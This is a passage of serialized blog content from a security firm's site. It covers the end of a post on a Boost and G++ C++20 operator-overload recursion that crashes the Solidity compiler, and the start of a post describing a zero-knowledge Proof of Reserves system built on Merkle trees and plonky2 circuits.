rational_detail::is_compatible_integer\u003CArg, IntType>::value, bool>::type\n",{"type":25,"tag":216,"props":95846,"children":95847},{"class":6922,"line":7110},[95848],{"type":25,"tag":216,"props":95849,"children":95850},{"style":6964},[95851],{"type":31,"value":95852},"   operator == (const Arg& b, const rational\u003CIntType>& a)\n",{"type":25,"tag":216,"props":95854,"children":95855},{"class":6922,"line":7216},[95856],{"type":25,"tag":216,"props":95857,"children":95858},{"style":6964},[95859],{"type":31,"value":14836},{"type":25,"tag":216,"props":95861,"children":95862},{"class":6922,"line":7244},[95863],{"type":25,"tag":216,"props":95864,"children":95865},{"style":8205},[95866],{"type":31,"value":95867},"-     return a == b;\n",{"type":25,"tag":216,"props":95869,"children":95870},{"class":6922,"line":7257},[95871],{"type":25,"tag":216,"props":95872,"children":95873},{"style":6989},[95874],{"type":31,"value":95875},"+     return a.operator==(b);\n",{"type":25,"tag":216,"props":95877,"children":95878},{"class":6922,"line":7275},[95879],{"type":25,"tag":216,"props":95880,"children":95881},{"style":6964},[95882],{"type":31,"value":7874},{"type":25,"tag":38,"props":95884,"children":95885},{},[95886,95888,95893,95895,95900],{"type":31,"value":95887},"Instead of calling ",{"type":25,"tag":82,"props":95889,"children":95891},{"className":95890},[],[95892],{"type":31,"value":94218},{"type":31,"value":95894}," — which triggers overload resolution again — the patched version directly calls the member function ",{"type":25,"tag":82,"props":95896,"children":95898},{"className":95897},[],[95899],{"type":31,"value":94226},{"type":31,"value":179},{"type":25,"tag":38,"props":95902,"children":95903},{},[95904],{"type":31,"value":95905},"This prevents C++20 from triggering recursive rewrites.",{"type":25,"tag":22753,"props":95907,"children":95908},{},[],{"type":25,"tag":26,"props":95910,"children":95912},{"id":95911},"part-iv-how-this-breaks-solidity",[95913],{"type":31,"value":95914},"Part IV: How This Breaks Solidity",{"type":25,"tag":38,"props":95916,"children":95917},{},[95918,95920,95925],{"type":31,"value":95919},"The Solidity codebase uses ",{"type":25,"tag":82,"props":95921,"children":95923},{"className":95922},[],[95924],{"type":31,"value":94073},{"type":31,"value":95926}," to represent certain compile-time constant expressions.",{"type":25,"tag":38,"props":95928,"children":95929},{},[95930,95932,95938],{"type":31,"value":95931},"One snippet that can trigger this issue appears in ",{"type":25,"tag":82,"props":95933,"children":95935},{"className":95934},[],[95936],{"type":31,"value":95937},"DeclarationTypeChecker::endVisit",{"type":31,"value":1472},{"type":25,"tag":206,"props":95940,"children":95942},{"code":95941,"language":33072,"meta":7,"className":33070,"style":7},"if (Expression const* length = _typeName.length()) {\n    std::optional\u003Crational> lengthValue;\n\n    if (length->annotation().type && length->annotation().type->category() == Type::Category::RationalNumber)\n        ...\n    else if (std::optional\u003CConstantEvaluator::TypedRational> value = ConstantEvaluator::evaluate(...))\n        lengthValue = value->value;\n\n    if (!lengthValue)\n        ...\n    else if (*lengthValue == 0)  // \u003C-- Infinite recursion happens here\n        ...\n}\n",[95943],{"type":25,"tag":82,"props":95944,"children":95945},{"__ignoreMap":7},[95946,95993,96018,96025,96103,96110,96163,96191,96198,96218,96225,96265,96272],{"type":25,"tag":216,"props":95947,"children":95948},{"class":6922,"line":6923},[95949,95953,95958,95962,95966,95971,95975,95980,95984,95988],{"type":25,"tag":216,"props":95950,"children":95951},{"style":6973},[95952],{"type":31,"value":19537},{"type":25,"tag":216,"props":95954,"children":95955},{"style":6964},[95956],{"type":31,"value":95957}," (Expression ",{"type":25,"tag":216,"props":95959,"children":95960},{"style":6936},[95961],{"type":31,"value":13611},{"type":25,"tag":216,"props":95963,"children":95964},{"style":6953},[95965],{"type":31,"value":8519},{"type":25,"tag":216,"props":95967,"children":95968},{"style":6964},[95969],{"type":31,"value":95970}," length ",{"type":25,"tag":216,"props":95972,"children":95973},{"style":6953},[95974],{"type":31,"value":266},{"type":25,"tag":216,"props":95976,"children":95977},{"style":6947},[95978],{"type":31,"value":95979}," _typeName",{"type":25,"tag":216,"props":95981,"children":95982},{"style":6964},[95983],{"type":31,"value":179},{"type":25,"tag":216,"props":95985,"children":95986},{"style":7047},[95987],{"type":31,"value":12456},{"type":25,"tag":216,"props":95989,"children":95990},{"style":6964},[95991],{"type":31,"value":95992},"()) {\n",{"type":25,"tag":216,"props":95994,"children":95995},{"class":6922,"line":6769},[95996,96001,96005,96009,96013],{"type":25,"tag":216,"props":95997,"children":95998},{"style":6964},[95999],{"type":31,"value":96000},"    std::optional",{"type":25,"tag":216,"props":96002,"children":96003},{"style":6953},[96004],{"type":31,"value":9757},{"type":25,"tag":216,"props":96006,"children":96007},{"style":6964},[96008],{"type":31,"value":95078},{"type":25,"tag":216,"props":96010,"children":96011},{"style":6953},[96012],{"type":31,"value":5902},{"type":25,"tag":216,"props":96014,"children":96015},{"style":6964},[96016],{"type":31,"value":96017}," lengthValue;\n",{"type":25,"tag":216,"props":96019,"children":96020},{"class":6922,"line":6778},[96021],{"type":25,"tag":216,"props":96022,"children":96023},{"emptyLinePlaceholder":16},[96024],{"type":31,"value":7642},{"type":25,"tag":216,"props":96026,"children":96027},{"class":6922,"line":7005},[96028,96032,96036,96040,96044,96048,96052,96056,96060,96065,96069,96073,96077,96081,96085,96090,96094,96098],{"type":25,"tag":216,"props":96029,"children":96030},{"style":6973},[96031],{"type":31,"value":16235},{"type":25,"tag":216,"props":96033,"children":96034},{"style":6964},[96035],{"type":31,"value":7016},{"type":25,"tag":216,"props":96037,"children":96038},{"style":6947},[96039],{"type":31,"value":12456},{"type":25,"tag":216,"props":96041,"children":96042},{"style":6964},[96043],{"type":31,"value":17714},{"type":25,"tag":216,"props":96045,"children":96046},{"style":7047},[96047],{"type":31,"value":34124},{"type":25,"tag":216,"props":96049,"children":96050},{"style":6964},[96051],{"type":31,"value":34129},{"type":25,"tag":216,"props":96053,"children":96054},{"style":6947},[96055],{"type":31,"value":36719},{"type":25,"tag":216,"props":96057,"children":96058},{"style":6953},[96059],{"type":31,"value":18142},{"type":25,"tag":216,"props":96061,"children":96062},{"style":6947},[96063],{"type":31,"value":96064}," length",{"type":25,"tag":216,"props":96066,"children":96067},{"style":6964},[96068],{"type":31,"value":17714},{"type":25,"tag":216,"props":96070,"children":96071},{"style":7047},[96072],{"type":31,"value":34124},{"type":25,"tag":216,"props":96074,"children":96075},{"style":6964},[96076],{"type":31,"value":34129},{"type":25,"tag":216,"props":96078,"children":96079},{"style":6947},[96080],{"type":31,"value":36719},{"type":25,"tag":216,"props":96082,"children":96083},{"style":6964},[96084],{"type":31,"value":17714},{"type":25,"tag":216,"props":96086,"children":96087},{"style":7047},[96088],{"type":31,"value":96089},"category",{"type":25,"tag":216,"props":96091,"children":96092},{"style":6964},[96093],{"type":31,"value":18000},{"type":25,"tag":216,"props":96095,"children":96096},{"style":6953},[96097],{"type":31,"value":12528},{"type":25,"tag":216,"props":96099,"children":96100},{"style":6964},[96101],{"type":31,"value":96102}," Type::Category::RationalNumber)\n",{"type":25,"tag":216,"props":96104,"children":96105},{"class":6922,"line":7110},[96106],{"type":25,"tag":216,"props":96107,"children":96108},{"style":6964},[96109],{"type":31,"value":85814},{"type":25,"tag":216,"props":96111,"children":96112},{"class":6922,"line":7216},[96113,96118,96122,96127,96131,96136,96140,96145,96149,96154,96158],{"type":25,"tag":216,"props":96114,"children":96115},{"style":6973},[96116],{"type":31,"value":96117},"    else",{"type":25,"tag":216,"props":96119,"children":96120},{"style":6973},[96121],{"type":31,"value":19746},{"type":25,"tag":216,"props":96123,"children":96124},{"style":6964},[96125],{"type":31,"value":96126}," (std::optional",{"type":25,"tag":216,"props":96128,"children":96129},{"style":6953},[96130],{"type":31,"value":9757},{"type":25,"tag":216,"props":96132,"children":96133},{"style":6964},[96134],{"type":31,"value":96135},"ConstantEvaluator::TypedRational",{"type":25,"tag":216,"props":96137,"children":96138},{"style":6953},[96139],{"type":31,"value":5902},{"type":25,"tag":216,"props":96141,"children":96142},{"style":6964},[96143],{"type":31,"value":96144}," value ",{"type":25,"tag":216,"props":96146,"children":96147},{"style":6953},[96148],{"type":31,"value":266},{"type":25,"tag":216,"props":96150,"children":96151},{"style":6964},[96152],{"type":31,"value":96153}," ConstantEvaluator::",{"type":25,"tag":216,"props":96155,"children":96156},{"style":7047},[96157],{"type":31,"value":41968},{"type":25,"tag":216,"props":96159,"children":96160},{"style":6964},[96161],{"type":31,"value":96162},"(...))\n",{"type":25,"tag":216,"props":96164,"children":96165},{"class":6922,"line":7244},[96166,96171,96175,96179,96183,96187],{"type":25,"tag":216,"props":96167,"children":96168},{"style":6964},[96169],{"type":31,"value":96170},"        lengthValue ",{"type":25,"tag":216,"props":96172,"children":96173},{"style":6953},[96174],{"type":31,"value":266},{"type":25,"tag":216,"props":96176,"children":96177},{"style":6947},[96178],{"type":31,"value":36473},{"type":25,"tag":216,"props":96180,"children":96181},{"style":6964},[96182],{"type":31,"value":17714},{"type":25,"tag":216,"props":96184,"children":96185},{"style":6947},[96186],{"type":31,"value":43115},{"type":25,"tag":216,"props":96188,"children":96189},{"style":6964},[96190],{"type":31,"value":6967},{"type":25,"tag":216,"props":96192,"children":96193},{"class":6922,"line":7257},[96194],{"type":25,"tag":216,"props":96195,"children":96196},{"emptyLinePlaceholder":16},[96197],{"type":31,"value":7642},{"type":25,"tag":216,"props":96199,"children":96200},{"class":6922,"line":7275},[96201,96205,96209,96213],{"type":25,"tag":216,"props":96202,"children":96203},{"style":6973},[96204],{"type":31,"value":16235},{"type":25,"tag":216,"props":96206,"children":96207},{"style":6964},[96208],{"type":31,"value":7016},{"type":25,"tag":216,"props":96210,"children":96211},{"style":6953},[96212],{"type":31,"value":24581},{"type":25,"tag":216,"props":96214,"children":96215},{"style":6964},[96216],{"type":31,"value":96217},"lengthValue)\n",{"type":25,"tag":216,"props":96219,"children":96220},{"class":6922,"line":7296},[96221],{"type":25,"tag":216,"props":96222,"children":96223},{"style":6964},[96224],{"type":31,"value":85814},{"type":25,"tag":216,"props":96226,"children":96227},{"class":6922,"line":7305},[96228,96232,96236,96240,96244,96248,96252,96256,96260],{"type":25,"tag":216,"props":96229,"children":96230},{"style":6973},[96231],{"type":31,"value":96117},{"type":25,"tag":216,"props":96233,"children":96234},{"style":6973},[96235],{"type":31,"value":19746},{"type":25,"tag":216,"props":96237,"children":96238},{"style":6964},[96239],{"type":31,"value":7016},{"type":25,"tag":216,"props":96241,"children":96242},{"style":6953},[96243],{"type":31,"value":8519},{"type":25,"tag":216,"props":96245,"children":96246},{"style":6964},[96247],{"type":31,"value":94049},{"type":25,"tag":216,"props":96249,"children":96250},{"style":6953},[96251],{"type":31,"value":12528},{"type":25,"tag":216,"props":96253,"children":96254},{"style":6989},[96255],{"type":31,"value":6992},{"type":25,"tag":216,"props":96257,"children":96258},{"style":6964},[96259],{"type":31,"value":1888},{"type":25,"tag":216,"props":96261,"children":96262},{"style":6927},[96263],{"type":31,"value":96264},"  // \u003C-- Infinite recursion happens here\n",{"type":25,"tag":216,"props":96266,"children":96267},{"class":6922,"line":7557},[96268],{"type":25,"tag":216,"props":96269,"children":96270},{"style":6964},[96271],{"type":31,"value":85814},{"type":25,"tag":216,"props":96273,"children":96274},{"class":6922,"line":7574},[96275],{"type":25,"tag":216,"props":96276,"children":96277},{"style":6964},[96278],{"type":31,"value":7874},{"type":25,"tag":38,"props":96280,"children":96281},{},[96282],{"type":31,"value":96283},"Under normal circumstances, this expression is benign. But:",{"type":25,"tag":2039,"props":96285,"children":96286},{},[96287,96292,96297],{"type":25,"tag":2043,"props":96288,"children":96289},{},[96290],{"type":31,"value":96291},"G++ \u003C 14 wrongly prefers Boost's non-member operator",{"type":25,"tag":2043,"props":96293,"children":96294},{},[96295],{"type":31,"value":96296},"C++20 reverses the arguments",{"type":25,"tag":2043,"props":96298,"children":96299},{},[96300],{"type":31,"value":96301},"The non-member operator recursively calls itself",{"type":25,"tag":38,"props":96303,"children":96304},{},[96305],{"type":31,"value":96306},"💥: segmentation fault.",{"type":25,"tag":22753,"props":96308,"children":96309},{},[],{"type":25,"tag":26,"props":96311,"children":96313},{"id":96312},"part-v-what-environments-are-affected",[96314],{"type":31,"value":96315},"Part V: What Environments are Affected?",{"type":25,"tag":38,"props":96317,"children":96318},{},[96319],{"type":31,"value":96320},"If a system uses any of the following:",{"type":25,"tag":2039,"props":96322,"children":96323},{},[96324,96329,96334],{"type":25,"tag":2043,"props":96325,"children":96326},{},[96327],{"type":31,"value":96328},"G++ \u003C 14 (e.g., Ubuntu 22.04 uses 11.4)",{"type":25,"tag":2043,"props":96330,"children":96331},{},[96332],{"type":31,"value":96333},"Boost \u003C 1.75 (e.g., 1.74 ships with Ubuntu)",{"type":25,"tag":2043,"props":96335,"children":96336},{},[96337],{"type":31,"value":96338},"C++20 enabled (default in recent Solidity builds)",{"type":25,"tag":38,"props":96340,"children":96341},{},[96342,96344,96349,96351,96357],{"type":31,"value":96343},"They will encounter this crash ",{"type":25,"tag":9273,"props":96345,"children":96346},{},[96347],{"type":31,"value":96348},"as soon as",{"type":31,"value":96350}," it processes a Solidity source with a length expression like ",{"type":25,"tag":82,"props":96352,"children":96354},{"className":96353},[],[96355],{"type":31,"value":96356},"T[0]",{"type":31,"value":96358}," or anything involving compile-time rational comparisons.",{"type":25,"tag":22753,"props":96360,"children":96361},{},[],{"type":25,"tag":26,"props":96363,"children":96365},{"id":96364},"recommendations",[96366],{"type":31,"value":96367},"Recommendations",{"type":25,"tag":2039,"props":96369,"children":96370},{},[96371,96379],{"type":25,"tag":2043,"props":96372,"children":96373},{},[96374],{"type":25,"tag":9273,"props":96375,"children":96376},{},[96377],{"type":31,"value":96378},"Update Boost to ≥ 1.75",{"type":25,"tag":2043,"props":96380,"children":96381},{},[96382],{"type":25,"tag":9273,"props":96383,"children":96384},{},[96385],{"type":31,"value":96386},"Pin G++ to v14 or later",{"type":25,"tag":22753,"props":96388,"children":96389},{},[],{"type":25,"tag":26,"props":96391,"children":96392},{"id":32892},[96393],{"type":31,"value":22907},{"type":25,"tag":38,"props":96395,"children":96396},{},[96397],{"type":31,"value":96398},"This isn’t a security vulnerability. It doesn’t corrupt memory or allow code execution.",{"type":25,"tag":38,"props":96400,"children":96401},{},[96402,96404,96408],{"type":31,"value":96403},"But it ",{"type":25,"tag":9273,"props":96405,"children":96406},{},[96407],{"type":31,"value":7949},{"type":31,"value":96409}," a reminder of the fragility of modern build stacks. A bug introduced in 2012, fixed in 2024, quietly broke one of the most used blockchain compiler toolchains — all without any code in the Solidity repo being “wrong.”",{"type":25,"tag":38,"props":96411,"children":96412},{},[96413],{"type":31,"value":96414},"Every layer here — Boost, G++, the C++20 spec, and Solidity — behaved “as documented.” But together, they composed into undefined behavior.",{"type":25,"tag":38,"props":96416,"children":96417},{},[96418],{"type":31,"value":96419},"The lesson? Always test critical software under multiple compilers and library versions — especially when enabling a new language standard.",{"type":25,"tag":9316,"props":96421,"children":96422},{},[96423],{"type":31,"value":9320},{"title":7,"searchDepth":6769,"depth":6769,"links":96425},[96426,96427,96432,96435,96436,96437,96438,96439],{"id":94109,"depth":6769,"text":94112},{"id":94198,"depth":6769,"text":94201,"children":96428},[96429,96430,96431],{"id":94204,"depth":6778,"text":94207},{"id":94272,"depth":6778,"text":94275},{"id":94363,"depth":6778,"text":94366},{"id":94947,"depth":6769,"text":94950,"children":96433},[96434],{"id":94953,"depth":6778,"text":94956},{"id":95064,"depth":6769,"text":95067},{"id":95911,"depth":6769,"text":95914},{"id":96312,"depth":6769,"text":96315},{"id":96364,"depth":6769,"text":96367},{"id":32892,"depth":6769,"text":22907},"content:blog:2025-08-11-compiler-bug-causes-compiler-bug.md","blog/2025-08-11-compiler-bug-causes-compiler-bug.md","blog/2025-08-11-compiler-bug-causes-compiler-bug",{"_path":96444,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":96445,"description":96446,"date":96447,"author":35162,"image":96448,"isFeatured":16,"onBlogPage":16,"tags":96450,"body":96453,"_type":6798,"_id":101216,"_source":6800,"_file":101217,"_stem":101218,"_extension":6803},"/blog/2025-08-27-how-proof-of-reserves-uses-zk-to-protect-your-funds","PoRv2: A Fast, Transparent ZK-Based Proof of Reserves","Here, we explore zk-proofs, Merkle trees, and our new open-source implementation, PoRv2. Our proof-of-reserve enables users to verify exchange liabilities without relying on external auditors, setting a new standard for trust.","2025-08-27",{"src":96449,"width":17580,"height":17580},"/posts/por/title.png",[96451,96452],"zk","por",{"type":22,"children":96454,"toc":101193},[96455,96461,96473,96485,96490,96522,96536,96542,96554,96559,96564,96601,96606,96612,96617,96624,96629,96655,96660,96666,96686,96700,96708,96713,96718,96726,96739,96745,96827,96833,96838,96851,96856,96863,96887,96895,96900,96906,96911,97354,97367,97373,97378,97386,97404,97412,97425,97433,99086,99091,99098,99104,99109,99116,99132,99139,99147,99154,100665,100670,100677,100683,100688,100715,100720,100739,100745,100753,100771,100820,100828,100847,100869,100875,100888,100893,100900,100905,100968,100973,100980,101000,101006,101011,101017,101022,101066,101071,101079,101085,101090,101132,101137,101145,101150,101158,101162,101167,101180],{"type":25,"tag":26,"props":96456,"children":96458},{"id":96457},"what-is-a-proof-of-reserves",[96459],{"type":31,"value":96460},"What is a Proof of Reserves?",{"type":25,"tag":38,"props":96462,"children":96463},{},[96464,96466,96471],{"type":31,"value":96465},"At its heart, ",{"type":25,"tag":9273,"props":96467,"children":96468},{},[96469],{"type":31,"value":96470},"Proof of Reserves (PoR)",{"type":31,"value":96472}," is a crucial system designed to show that a crypto platform genuinely holds the funds it owes to its users. It's how exchanges and custodians can prove, using strong cryptographic methods, that they have enough assets to cover all customer deposits.",{"type":25,"tag":38,"props":96474,"children":96475},{},[96476,96478,96483],{"type":31,"value":96477},"Think of it this way: ",{"type":25,"tag":9273,"props":96479,"children":96480},{},[96481],{"type":31,"value":96482},"PoR",{"type":31,"value":96484}," is about enabling transparency. It's a way for platforms to provide clear, verifiable evidence of their financial health. For users, it means gaining confidence that their funds are secure on the platforms they use.",{"type":25,"tag":38,"props":96486,"children":96487},{},[96488],{"type":31,"value":96489},"Historically, traditional ways of proving reserves often had drawbacks. They might reveal too much sensitive information about the platform and rely heavily on external auditors without a direct user verification method.",{"type":25,"tag":38,"props":96491,"children":96492},{},[96493,96495,96502,96504,96511,96513,96520],{"type":31,"value":96494},"We from OtterSec, in partnership with ",{"type":25,"tag":162,"props":96496,"children":96499},{"href":96497,"rel":96498},"https://backpack.exchange/",[166],[96500],{"type":31,"value":96501},"Backpack",{"type":31,"value":96503},", just developed a Proof of Reserves system that can be used to prove CEX solvency. Our ",{"type":25,"tag":162,"props":96505,"children":96508},{"href":96506,"rel":96507},"https://github.com/otter-sec/por_v2",[166],[96509],{"type":31,"value":96510},"Zero-Knowledge Proof of Reserves (PoRv2)",{"type":31,"value":96512}," was based on ",{"type":25,"tag":162,"props":96514,"children":96517},{"href":96515,"rel":96516},"https://www.okx.com/en-eu/help/zero-knowledge-proofs-what-are-zk-starks-and-how-do-they-work-v2",[166],[96518],{"type":31,"value":96519},"OKX Proof of Reserves algorithm",{"type":31,"value":96521}," since it was the fastest and most efficient one known so far. We also use recursive plonky2 as the algorithm for zero-knowledge proving, but we made some improvements to the circuits for more transparency and verifiable information on the user side, eliminating the need to trust the audit company.",{"type":25,"tag":38,"props":96523,"children":96524},{},[96525,96527,96534],{"type":31,"value":96526},"In addition, we also created and open-sourced a ",{"type":25,"tag":162,"props":96528,"children":96531},{"href":96529,"rel":96530},"https://github.com/otter-sec/por_verifier_server",[166],[96532],{"type":31,"value":96533},"PoR verifier server",{"type":31,"value":96535}," that receives the proofs and validates them.",{"type":25,"tag":26,"props":96537,"children":96539},{"id":96538},"why-do-we-use-zk-for-por",[96540],{"type":31,"value":96541},"Why do we use ZK for PoR?",{"type":25,"tag":38,"props":96543,"children":96544},{},[96545,96547,96552],{"type":31,"value":96546},"Proving reserves is crucial, but it presents a unique challenge for any platform holding user funds: how do you publicly prove solvency without also exposing sensitive user balance information or revealing proprietary financial details? This is where ",{"type":25,"tag":9273,"props":96548,"children":96549},{},[96550],{"type":31,"value":96551},"Zero-Knowledge Proofs (ZKPs)",{"type":31,"value":96553}," become game-changers.",{"type":25,"tag":38,"props":96555,"children":96556},{},[96557],{"type":31,"value":96558},"Simply put, a Zero-Knowledge Proof allows one party to prove to another that a statement is true without revealing any information beyond the validity of the statement itself. Imagine proving you know a secret password without actually telling anyone the password. You confirm you possess the knowledge, but the secret remains yours.",{"type":25,"tag":38,"props":96560,"children":96561},{},[96562],{"type":31,"value":96563},"In the context of Proof of Reserves, ZKPs are perfectly suited to solve the privacy paradox. They enable a platform to prove two important things cryptographically:",{"type":25,"tag":6711,"props":96565,"children":96566},{},[96567,96584],{"type":25,"tag":2043,"props":96568,"children":96569},{},[96570,96575,96577,96583],{"type":25,"tag":9273,"props":96571,"children":96572},{},[96573],{"type":31,"value":96574},"Sum proof",{"type":31,"value":96576},": The exchange liability is equal to the sum of all users' balances. (e.g: ",{"type":25,"tag":82,"props":96578,"children":96580},{"className":96579},[],[96581],{"type":31,"value":96582},"btc_liability = user1_btc + user2_btc + user3_btc + ...",{"type":31,"value":24702},{"type":25,"tag":2043,"props":96585,"children":96586},{},[96587,96592,96594,96599],{"type":25,"tag":9273,"props":96588,"children":96589},{},[96590],{"type":31,"value":96591},"Non-negativity",{"type":31,"value":96593},": All users have a ",{"type":25,"tag":9273,"props":96595,"children":96596},{},[96597],{"type":31,"value":96598},"positive",{"type":31,"value":96600}," net balance. This ensures that the sum proof is not tampered with by users with negative net balances. A user can have negative asset balances (e.g., borrowing BTC) but only if collateralized with other assets.",{"type":25,"tag":38,"props":96602,"children":96603},{},[96604],{"type":31,"value":96605},"It is worth noting that we cannot guarantee that all users were included in the ZK analysis. Therefore, if we only used ZKPs to prove those two statements, the exchange could tamper with the sum proof by excluding users from the PoR. That's why we also use a Merkle tree to prove inclusions.",{"type":25,"tag":26,"props":96607,"children":96609},{"id":96608},"what-is-a-merkle-tree-and-how-does-it-help-in-a-por",[96610],{"type":31,"value":96611},"What is a Merkle Tree and how does it help in a PoR?",{"type":25,"tag":38,"props":96613,"children":96614},{},[96615],{"type":31,"value":96616},"A Merkle tree is a tree data structure where each leaf node is a cryptographic hash of an individual piece of data (like a user's balance), and every non-leaf node is a cryptographic hash of its child nodes. This structure allows for the entire dataset to be summarized by a single, unique hash at the top, called the Merkle Root.",{"type":25,"tag":38,"props":96618,"children":96619},{},[96620],{"type":25,"tag":6467,"props":96621,"children":96623},{"alt":54547,"src":96622},"/posts/por/merkle-tree.png",[],{"type":25,"tag":38,"props":96625,"children":96626},{},[96627],{"type":31,"value":96628},"In the PoR, we can use a Merkle tree to verify the inclusion of each user in the Proof of Reserves. It works like this:",{"type":25,"tag":6711,"props":96630,"children":96631},{},[96632,96645,96650],{"type":25,"tag":2043,"props":96633,"children":96634},{},[96635,96637,96643],{"type":31,"value":96636},"The Merkle tree is generated using the leaf nodes as the hashes of the user information (e.g., ",{"type":25,"tag":82,"props":96638,"children":96640},{"className":96639},[],[96641],{"type":31,"value":96642},"sha256({id: 1, balances: {\"BTC\": 0.1, \"ETH\": 0.2, ...}})",{"type":31,"value":96644},");",{"type":25,"tag":2043,"props":96646,"children":96647},{},[96648],{"type":31,"value":96649},"The Merkle tree is made public;",{"type":25,"tag":2043,"props":96651,"children":96652},{},[96653],{"type":31,"value":96654},"Each user can download the Merkle tree and check if their account was included by hashing their account information and checking if the hash is one of the leaves;",{"type":25,"tag":38,"props":96656,"children":96657},{},[96658],{"type":31,"value":96659},"In other words, this use of the Merkle tree allows users to easily verify that their individual balance was included in the overall total.",{"type":25,"tag":26,"props":96661,"children":96663},{"id":96662},"ottersec-porv2",[96664],{"type":31,"value":96665},"OtterSec PoRv2",{"type":25,"tag":38,"props":96667,"children":96668},{},[96669,96675,96677,96684],{"type":25,"tag":162,"props":96670,"children":96672},{"href":96506,"rel":96671},[166],[96673],{"type":31,"value":96674},"We just open-sourced our Proof of Reserves code (PoRv2)",{"type":31,"value":96676},", which uses the ",{"type":25,"tag":162,"props":96678,"children":96681},{"href":96679,"rel":96680},"https://github.com/0xPolygonZero/plonky2",[166],[96682],{"type":31,"value":96683},"plonky2 ZK algorithm",{"type":31,"value":96685}," to create a Merkle tree and a final ZK proof that recursively verifies smaller sum and non-negativity proofs.",{"type":25,"tag":38,"props":96687,"children":96688},{},[96689,96691,96698],{"type":31,"value":96690},"We named it PoRv2 because we already had a version based on ",{"type":25,"tag":162,"props":96692,"children":96695},{"href":96693,"rel":96694},"https://vitalik.eth.limo/general/2022/11/19/proof_of_solvency.html",[166],[96696],{"type":31,"value":96697},"Vitalik's proof of solvency",{"type":31,"value":96699},", which was not optimal.",{"type":25,"tag":38,"props":96701,"children":96702},{},[96703],{"type":25,"tag":9273,"props":96704,"children":96705},{},[96706],{"type":31,"value":96707},"Non-negativity Proof",{"type":25,"tag":38,"props":96709,"children":96710},{},[96711],{"type":31,"value":96712},"In our non-negativity proof, the circuit receives the asset balances of each user and the price of each asset. With these inputs, it calculates the account's USD balance and checks if it is greater than 0.",{"type":25,"tag":38,"props":96714,"children":96715},{},[96716],{"type":31,"value":96717},"We also check for overflows during summation to prevent tampering in the final result.",{"type":25,"tag":38,"props":96719,"children":96720},{},[96721],{"type":25,"tag":9273,"props":96722,"children":96723},{},[96724],{"type":31,"value":96725},"Sum Proof",{"type":25,"tag":38,"props":96727,"children":96728},{},[96729,96731,96737],{"type":31,"value":96730},"The sum proof verifies a public circuit input that was calculated by summing up all user balances of each asset. (e.g., ",{"type":25,"tag":82,"props":96732,"children":96734},{"className":96733},[],[96735],{"type":31,"value":96736},"BTC final: user1_btc + user2_btc ...",{"type":31,"value":96738},"). Note that each asset's final sum is not USD-based; we calculate the final balance using the asset balance itself.",{"type":25,"tag":606,"props":96740,"children":96742},{"id":96741},"what-are-the-ottersec-porv2-key-points",[96743],{"type":31,"value":96744},"What are the OtterSec PoRv2 key points?",{"type":25,"tag":6711,"props":96746,"children":96747},{},[96748,96758,96776,96786,96817],{"type":25,"tag":2043,"props":96749,"children":96750},{},[96751,96756],{"type":25,"tag":9273,"props":96752,"children":96753},{},[96754],{"type":31,"value":96755},"Transparency",{"type":31,"value":96757},": It is possible for the exchange to safely disclose the entire Merkle tree so users can verify it without the need for an external auditing company. Also, the code allows asset price commitments and verifications.",{"type":25,"tag":2043,"props":96759,"children":96760},{},[96761,96766,96768,96775],{"type":25,"tag":9273,"props":96762,"children":96763},{},[96764],{"type":31,"value":96765},"Time-efficiency",{"type":31,"value":96767},": We were able to reduce the amount of time to prove by more than 100 times from our previous version by generating proofs for 750,000 users within 8 minutes using a Mac M3 Pro. ",{"type":25,"tag":162,"props":96769,"children":96772},{"href":96770,"rel":96771},"https://github.com/otter-sec/por_v2?tab=readme-ov-file#benchmark",[166],[96773],{"type":31,"value":96774},"Check our benchmark",{"type":31,"value":179},{"type":25,"tag":2043,"props":96777,"children":96778},{},[96779,96784],{"type":25,"tag":9273,"props":96780,"children":96781},{},[96782],{"type":31,"value":96783},"Memory-efficiency",{"type":31,"value":96785},": We also were able to reduce the amount of RAM needed to prove the liabilities of millions of users. Now, we are able to use machines with 16GB.",{"type":25,"tag":2043,"props":96787,"children":96788},{},[96789,96794,96796,96801,96803,96808,96810,96815],{"type":25,"tag":9273,"props":96790,"children":96791},{},[96792],{"type":31,"value":96793},"Small-proofs",{"type":31,"value":96795},": We were able to reduce the final proof to less than ",{"type":25,"tag":9273,"props":96797,"children":96798},{},[96799],{"type":31,"value":96800},"500KB",{"type":31,"value":96802}," and each inclusion proof to ",{"type":25,"tag":9273,"props":96804,"children":96805},{},[96806],{"type":31,"value":96807},"~52KB",{"type":31,"value":96809},". The only big file that we need to store is the Merkle tree, which doesn't consume more than ",{"type":25,"tag":9273,"props":96811,"children":96812},{},[96813],{"type":31,"value":96814},"200MB",{"type":31,"value":96816}," if the PoR parameters are finely adjusted. Additionally, instead of storing each inclusion proof in a static file, we provide an efficient method to generate inclusion proofs on demand, eliminating the need for the exchange to store millions of files and conserve disk space and resources.",{"type":25,"tag":2043,"props":96818,"children":96819},{},[96820,96825],{"type":25,"tag":9273,"props":96821,"children":96822},{},[96823],{"type":31,"value":96824},"Privacy",{"type":31,"value":96826},": We use many cryptographic mechanisms to ensure that the user balances and other private information are kept safe and secret.",{"type":25,"tag":26,"props":96828,"children":96830},{"id":96829},"zk-circuits",[96831],{"type":31,"value":96832},"ZK Circuits",{"type":25,"tag":38,"props":96834,"children":96835},{},[96836],{"type":31,"value":96837},"We use two different ZK circuits to generate the final proof:",{"type":25,"tag":6711,"props":96839,"children":96840},{},[96841,96846],{"type":25,"tag":2043,"props":96842,"children":96843},{},[96844],{"type":31,"value":96845},"Batch circuit",{"type":25,"tag":2043,"props":96847,"children":96848},{},[96849],{"type":31,"value":96850},"Recursive circuit",{"type":25,"tag":38,"props":96852,"children":96853},{},[96854],{"type":31,"value":96855},"With those two circuits, we can generate the proofs recursive tree:",{"type":25,"tag":38,"props":96857,"children":96858},{},[96859],{"type":25,"tag":6467,"props":96860,"children":96862},{"alt":54547,"src":96861},"/posts/por/batch-circuit.png",[],{"type":25,"tag":34,"props":96864,"children":96865},{},[96866],{"type":25,"tag":38,"props":96867,"children":96868},{},[96869,96871,96877,96879,96885],{"type":31,"value":96870},"Note: We are using 512 as ",{"type":25,"tag":82,"props":96872,"children":96874},{"className":96873},[],[96875],{"type":31,"value":96876},"BATCH_SIZE",{"type":31,"value":96878}," and 8 as ",{"type":25,"tag":82,"props":96880,"children":96882},{"className":96881},[],[96883],{"type":31,"value":96884},"RECURSIVE_SIZE",{"type":31,"value":96886}," which indicates how many children each circuit has. This is easily adjustable in the code, and the optimal configuration will depend on the amount of accounts being proved in the 